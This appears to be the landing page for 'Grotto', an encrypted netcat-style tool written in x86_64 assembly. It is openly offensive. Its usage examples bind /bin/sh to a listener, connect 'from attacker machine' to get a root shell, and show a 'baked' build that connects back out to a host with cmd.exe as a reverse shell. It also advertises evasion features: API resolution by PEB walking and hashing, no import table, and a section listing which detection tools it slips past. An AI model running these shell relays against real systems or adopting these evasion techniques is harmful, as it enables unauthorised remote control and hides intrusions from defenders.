Encrypted netcat. Pure assembly.

ChaCha20-Poly1305 AEAD encryption over TCP. Cross-platform Linux and Windows binaries in pure x86_64 NASM. Zero dependencies, zero imports, ~8 KB on disk.

Download Latest View Source
grotto 
# Generate 256-bit pre-shared key
$ KEY=$(python3 -c "import secrets; print(secrets.token_hex(32))")

# Listener with encrypted shell relay
$ ./grotto -l -p 4444 -k $KEY -e /bin/sh
[*] listening on 0.0.0.0:4444
[*] connection from 10.10.14.3
[*] shell relay active — encrypted bidirectional

# Connect from attacker machine
$ ./grotto -c 10.10.10.5 -p 4444 -k $KEY
id
uid=0(root) gid=0(root)
0
Binary
ChaCha20
Poly1305
0
Platforms
0
Dependencies
FEATURES

Encrypted networking from scratch

Full AEAD encryption, cross-platform assembly, shell relay, and zero dependencies in under 13 KB.

AEAD Encryption

Full RFC 8439 ChaCha20-Poly1305 in pure x86_64 assembly. 256-bit pre-shared key, random 12-byte nonce per message, authenticated ciphertext. Tampered payloads silently rejected.

$ ./grotto -l -p 4444 -k $KEY
[*] listening on 0.0.0.0:4444
[*] connection from 10.10.14.3
[*] AEAD relay active
~8KB
Windows PE

Cross-Platform

Linux ELF (~13 KB) and Windows PE (~8 KB) from shared crypto core. Same wire protocol — full interoperability between platforms.

PEB Walking

All Windows APIs resolved at runtime via PEB walk and ror13 hash matching. No import table, no API name strings — 25 functions across kernel32, ws2_32, advapi32.

Raw Syscalls

Linux binary uses direct syscall instructions. No libc, no dynamic linking, fully static ELF. Socket, bind, connect, poll — all via kernel interface.

0
Dependencies

Encrypted Shell (-e)

Spawn cmd.exe or /bin/sh with stdin/stdout piped through the AEAD channel. Full bidirectional relay — every keystroke and response authenticated and encrypted.

$ ./grotto -l -p 4444 -k $KEY -e /bin/sh
[*] shell relay active
whoami
root

Threaded + Poll

Windows uses CreateThread with WaitForMultipleObjects for concurrent relay. Linux uses poll(2) for single-threaded multiplexed I/O.

Connect / Listen

Standard netcat-style modes. Listen for inbound connections or connect out to a target. Bidirectional encrypted relay on every byte.

CAPABILITIES

Built from the ground up

Every byte hand-written in NASM. No compiler, no runtime, no dependencies.

ChaCha20
Poly1305
AEAD
Connect Mode
Listen Mode
Shell Relay
Linux ELF
Windows PE
PEB Walking
Raw Syscalls
Zero Imports
No libc
Threaded (Win)
Poll (Linux)
Both Platforms   Platform-Specific
ARCHITECTURE

Four-layer design

Shared crypto core with platform-specific networking and I/O. ~3,800 lines of handwritten x86_64 NASM.

1

Crypto Core

ChaCha20 quarter-round, block generation, stream XOR. Poly1305 mod 2^130-5 with 128-bit partial products. AEAD envelope per RFC 8439 Section 2.8. Shared between both platforms via .inc includes.

2

Network Layer

Linux: raw socket/bind/accept/connect syscalls. Windows: Winsock2 via PEB-resolved ws2_32.dll. Both support listen and connect modes with identical wire protocol.

3

Platform I/O

Linux: poll(2) event loop multiplexing socket and stdin/pipe. Windows: CreateThread with dual worker threads and WaitForMultipleObjects for concurrent bidirectional relay.

4

Shell Relay

Linux: fork/execve/dup2 with pipe redirection. Windows: CreateProcessA with STARTUPINFO pipe handles. Both pipe shell I/O through the AEAD channel.

GETTING STARTED

Build from source

NASM assembler + platform linker. Both targets build in under a second.

build
$ git clone https://github.com/Real-Fruit-Snacks/Grotto.git
$ cd Grotto && make all

# Or use the build script (generates random PSK)
$ ./build.sh

$ ls -la build/
grotto      13288  (Linux ELF)
grotto.exe   8192  (Windows PE)
usage
# Encrypted listener with shell
$ ./grotto -l -p 4444 -k $KEY -e /bin/sh

# Connect to encrypted listener
$ ./grotto -c 10.10.10.5 -p 4444 -k $KEY

# Pipe data through encrypted channel
$ echo "secret" | ./grotto -c host -p 4444 -k $KEY

# Baked build — zero CLI arguments
$ ./build.sh --baked -c 10.10.14.1 -p 443 -e cmd.exe
DETECTION AWARENESS

Know the boundaries

Hidden From

  • strings — no API names, encrypted wire format
  • Import table analysis — no DLL imports (Windows PE)
  • Passive traffic monitoring — all data AEAD encrypted
  • Binary size heuristics — ~8 KB within normal range

Visible To

  • strace, eBPF — syscall tracing reveals behavior
  • Network metadata — connection endpoints, timing, volume
  • Static analysis — disassembly reveals crypto patterns
  • Memory forensics — key material in process memory